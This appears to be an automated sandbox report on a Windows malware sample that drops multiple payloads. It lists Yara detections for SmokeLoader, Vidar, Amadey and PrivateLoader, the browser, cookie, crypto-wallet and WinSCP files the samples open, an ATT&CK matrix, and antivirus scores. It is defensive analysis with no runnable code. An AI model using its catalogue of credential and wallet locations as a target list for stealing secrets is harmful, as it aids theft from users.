Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\D5B9.exe VolumeInformation

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_0041032D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_0041032D

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_00420CF5 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

5_2_00420CF5

Source: C:\Users\user\AppData\Local\Temp\759F.exe

5_2_00404F90

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 40.2.D5B9.exe.4377990.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.D5B9.exe.4377990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.D5B9.exe.42ddb50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.499652756.0000000004275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Clipboard Hijacker

Source: Yara match	File source: 35.0.build3.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.build3.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, type: DROPPED

Yara detected Fabookie

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 38.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.build2.exe.37a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.build2.exe.37a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.509075402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.488659141.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PrivateLoader

Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??:
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??:
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??:
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match

File source: 00000026.00000002.513851805.00000000022D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Fabookie

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 38.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.build2.exe.37a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.build2.exe.37a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.509075402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.488659141.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PrivateLoader

Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	2 Data Encrypted for Impact
Default Accounts	2 Native API	1 Scheduled Task/Job	612 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	31 Obfuscated Files or Information	1 Credentials in Registry	45 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Exploitation for Client Execution	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	2 Command and Scripting Interpreter	Network Logon Script	1 Services File Permissions Weakness	1 DLL Side-Loading	LSA Secrets	441 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	126 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Scheduled Task/Job	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	612 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	48%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	100%	Avira	TR/Crypt.XPACK.Gen8
C:\Users\user\AppData\Local\Temp\oldplayer.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\XandETC.exe	100%	Avira	HEUR/AGEN.1329655
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	100%	Avira	TR/Crypt.XPACK.Gen8
C:\Users\user\AppData\Local\Temp\D5B9.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	100%	Avira	TR/Crypt.XPACK.Gen8
C:\Users\user\AppData\Local\Temp\F86F.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Temp\9B15.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oldplayer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E8B1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\AF5C.exe	100%	Joe Sandbox ML
